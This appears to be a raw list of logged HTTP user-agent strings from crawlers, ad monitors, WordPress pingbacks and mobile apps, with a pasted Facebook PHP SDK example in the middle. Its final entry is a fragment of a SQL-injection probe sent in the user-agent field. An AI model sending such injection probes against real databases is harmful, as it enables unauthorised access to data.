tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620521979-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620530508-0 +WhatsApp/2.21.10.7 A +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57 +WordPress/5.7.1; https://wfpc.online +A1 Website Analyzer/10.1.4 (+https://www.microsystools.com/products/website-analyzer/) +PHP-Curl-Class/4.13.0 (+https://github.com/php-curl-class/php-curl-class) PHP/7.4.7 curl/7.69.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 PTST/390 +WordPress/5.7.1; https://ranklaptop.com +WordPress/5.5.4; https://esubstation.com +WordPress/5.5.4; https://internetbrowserchrome.com +WordPress/5.5.4; https://ataindy.com +WordPress/5.5.4; https://interexna.com +WordPress/5.7.1; http://accordify.info +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:87.0) adbeat.com/policy Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620673353-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620676530-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 4.4.4; SM-J701F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620679937-0 +yacybot (/global; amd64 FreeBSD 10.3-RELEASE; java 1.8.0_77; GMT/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; MJ12bot/v1.2.5; http://www.majestic12.co.uk/bot.php?+) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 7.1.1; SM-G600FY ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 8.0.0; GT-S5360 ) U2/1.0.0 Mobile +WordPress/5.7.1; https://glagolitic-medium.000webhostapp.com +WordPress/5.7.1; https://mindrnd123.000webhostapp.com +WordPress/5.7.1; https://sagdgdgd.000webhostapp.com +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Mobile Safari/537.36 PTST/210505.150550 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 7.1.1; SM-G600FY ) U2/1.0.0 Mobile +Jersey/2.25.1 (HttpUrlConnection 1.8.0_282) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620754999-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620755232-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620762699-10 +WhatsApp/2.21.9.13 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620694896-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620703408-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.1; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620743679-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620743681-0 +WordPress/5.1.9; http://www.mvr.mobi +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620764370-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620765761-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620770022-0 +Mozilla/5.0 (compatible; heritrix/3.3.0-SNAPSHOT-20160309-0050; UniLeipzigASV +http://corpora.informatik.uni-leipzig.de/crawler_faq.html) +Mozilla/5.0 (compatible; Lipperhey Site Explorer; http://www.lipperhey.com/) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1620715302-60 +WhatsApp/2.21.90.14 i +Flok's crawler (https://flok.codes). I respect robots.txt +WordPress/5.7.1; https://win-torrent.ru +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 PTST/210511.202013 +WhatsApp/2.21.10.9 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620854773-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620856751-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620861173-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620784968-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620794865-0 +WordPress/5.6.3; https://creeis.me +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620841750-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620841744-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Mobile Safari/537.36 PTST/210511.202013 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/90.0.4430.97Safari/537.36 +Mozilla/5.0 (compatible; bnf.fr_bot; +http://bibnum.bnf.fr/robot/bnf.html) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) NetNewsWire/2.1.1 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/90.0.4430.97 Safari/537.36 +Snapchat/11.26.1.35 (iPhone9,3; iOS 14.5.1; gzip) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 6.0; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620805242-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620805241-0 +require_once __DIR__ . '/vendor/autoload.php'; // change path as needed $fb = new \Facebook\Facebook([ 'app_id' => '{app-id}', 'app_secret' => '{app-secret}', 'default_graph_version' => 'v2.10', //'default_access_token' => '{access-token}', // optional ]); // Use one of the helper classes to get a Facebook\Authentication\AccessToken entity. // $helper = $fb->getRedirectLoginHelper(); // $helper = $fb->getJavaScriptHelper(); // $helper = $fb->getCanvasHelper(); // $helper = $fb->getPageTabHelper(); try { // Get the \Facebook\GraphNodes\GraphUser object for the current user. // If you provided a 'default_access_token', the '{access-token}' is optional. $response = $fb->get('/me', '{access-token}'); } catch(\Facebook\Exceptions\FacebookResponseException $e) { // When Graph returns an error echo 'Graph returned an error: ' . $e->getMessage(); exit; } catch(\Facebook\Exceptions\FacebookSDKException $e) { // When validation fails or other local issues echo 'Facebook SDK returned an error: ' . $e->getMessage(); exit; } $me = $response->getGraphUser(); echo 'Logged in as ' . $me->getName(); +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620916601-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620916623-0 +FreeWebMonitoring SiteChecker/0.2 (+https://www.freewebmonitoring.com/bot.html) +WhatsApp/2.21.10.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620949450-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620949455-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620949522-10 +PycURL/7.43.0.6 libcurl/7.54.0 LibreSSL/2.0.20 zlib/1.2.11 nghttp2/1.24.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620912305-0 +Java/1.8.0_181-google-v7 +WordPress/5.7.2; https://filles-nues.site +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/90.0.4430.97 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Python-urllib/3.2 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 5.1.2; SM-J330G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620894752-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620894752-60 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 7.1.2; SM-J330G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620894751-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620894765-0 +WordPress/5.7.2; https://lifashionist.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620894753-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620894767-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620951812-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620960915-0 +WordPress/5.7.2; https://nipalki.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1620971103-10 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~xxnet-96) +WordPress/5.6.4; https://minervasemanal.eu +WhatsApp/2.21.10.11 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620954315-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1620962507-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +WordPress/5.6.4; https://onlyfineporn.com +WordPress/5.6.4; https://chinchar.me +WordPress/5.7.2; https://digitalniarchitekti.cz +python-urllib3/1.26.4 +yacybot (/global; amd64 Linux 5.4.0-73-generic; java 1.8.0_292; Etc/en) http://yacy.net/bot.html +Apache-HttpClient/4.1.2+(java+1.5) +okhttp/3.13.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 PTST/210514.195132 +WordPress/5.7.2; https://eurolearnit.org +WordPress/5.7.2; http://wildfire.asia +WordPress/5.7.2; https://relievepeyronies.com +WordPress/5.7.2; https://katherineheiglcollection.com +WordPress/5.7.2; https://akisloukas.com +WordPress/5.7.2; https://sospermisdeconduire.ch +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621039443-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621047247-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Mobile Safari/537.36 PTST/210514.195132 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621094122-10 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 5.1; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621109047-10 +WordPress/5.6.4; https://amzm.me +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621040154-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621049499-0 +WhatsApp/2.2119.3 N +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Mobile Safari/537.36 PTST/210515.140651 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 4.4.2; IdeaTabA1000-G ) U2/1.0.0 Mobile +WordPress/5.6.4; https://blogchain.com.ua +WordPress/5.7.2; https://nlinloggen.com +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4500.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Botbox TV/1.0 (Linux;Android 5.0.2) ExoPlayerLib/2.11.3 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 7.1.2; DLI-TL20 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 6.0; SM-N900 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621188738-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621200915-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621208343-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621125614-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621133624-0 +WhatsApp/2.21.10.12 A +Voyager3/AmigaoS3.1 +WordPress/5.6.4; https://xvideos.sale +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 5.0; SM-C111 ) U2/1.0.0 Mobile +WhatsApp/2.21.9.15 A +WordPress/5.6.4; https://semnestalo.pw +Botbox TV/1.0 (Linux;Android 6.0) ExoPlayerLib/2.11.3 +Apache-HttpClient/4.5.12 (Java/11.0.9.1) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 7.1.2; SM-J727T1 ) U2/1.0.0 Mobile +WordPress/2.8.4; http://wall-climb.com +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15 +WWW-Mechanize/2.03 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621259407-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621269169-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621285668-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 PTST/210515.140651 +WhatsApp/2.21.9.14 A +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) adbeat.com/policy Gecko/20100101 Firefox/88.0 +WordPress/5.6.4; http://musculation.skaka.org; verifying pingback from 174.138.27.185 +WordPress/4.5.2; http://www.stonehub.us; verifying pingback from 167.99.59.104 +WordPress/5.2.11; https://superworldvitamin.com +WordPress/5.5.5; https://nthgencomp.com +WordPress/5.5.5; https://ptedistribution.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621361892-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621375762-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621299239-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621307628-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621349307-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621349315-0 +yacybot (-global; amd64 Linux 5.2.9-Jinsol; java 12.0.2; Europe/en) http://yacy.net/bot.html +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 8.1.0; SM-J330G ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 5.1; SM-J330G ) U2/1.0.0 Mobile +WordPress.com; https://coulsontitan.wordpress.com +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.25.1.el7.x86_64 +GuzzleHttp/6.3.3 curl/7.70.0 PHP/7.4.16 +RadiosNet/2.2.5 (Java; Android) +WordPress/5.7.2; http://paulwright.id.au +okhttp/:7.5 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621465067-0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) adbeat.com/policy Gecko/20100101 Firefox/60.0 +WordPress/5.4.6; http://bertjohansmit.nl; verifying pingback from 208.180.202.147 +Google Chrome 51.0.2704.103 on Windows 10 +WhatsApp/2.21.11.3 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621384996-0 +WhatsApp/2.21.11.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621393124-0 +WordPress/5.7.2; https://demandezfr.com +WordPress/5.6.4; http://lesoutrali.com/cm +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621464721-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621464964-0 +Screaming Frog SEO Spider/15.2 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.1; GT-S5360 ) U2/1.0.0 Mobile +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~stevenwong2009) +Python-urllib%2F3.2 +ZEUSHDTHREE-v4.0.4 +Mozilla/5.0 (X11; Linux x86_64; rv:88.0) adbeat.com/policy Gecko/20100101 Firefox/88.0 +WordPress/5.7.2; https://trevojnui.ru +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.75 +WhatsApp/2.2119.6 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621531137-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621537780-10 +PycURL/7.43.0.6 libcurl/7.61.1 OpenSSL/1.1.1g zlib/1.2.11 brotli/1.0.6 libidn2/2.2.0 libpsl/0.20.2 (+libidn2/2.2.0) libssh/0.9.4/openssl/zlib nghttp2/1.33.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621472623-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621481314-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621529829-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1621541495-0 +WhatsApp/2.21.11.5 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 PTST/210519.173458 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1621483023-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1621542520-60 +GuzzleHttp/6.5.5 curl/7.74.0 PHP/7.4.19 +WordPress/5.6.4; https://tonted.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621530978-0 +Java/1.8.0_163 +Snapchat/11.18.0.31 (KFMAWI; Android 9#0019696952708#28; gzip) V/MUSHROOM +WordPress/5.1.10; http://www.mvr.mobi +WordPress/5.7.2; https://www.bornabritnotlegit.com; verifying pingback from 116.96.62.19 +WordPress/4.9.18; https://www.senc.es; verifying pingback from 192.40.220.138 +WordPress/5.5.5; https://galaktyczny.pl +WordPress/5.5.5; https://gourmetbasket.com.au +WordPress/5.7.2; http://accordify.info +WordPress/5.5.5; https://skitraxx.com +WordPress/5.5.5; https://internetbrowserchrome.com +WordPress/5.5.5; https://l50m.com +WordPress/5.5.5; https://ataindy.com +WordPress/5.5.5; https://datasearchsystems.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621587630-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621587628-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1621587642-0 +LWPrCa2l') OR 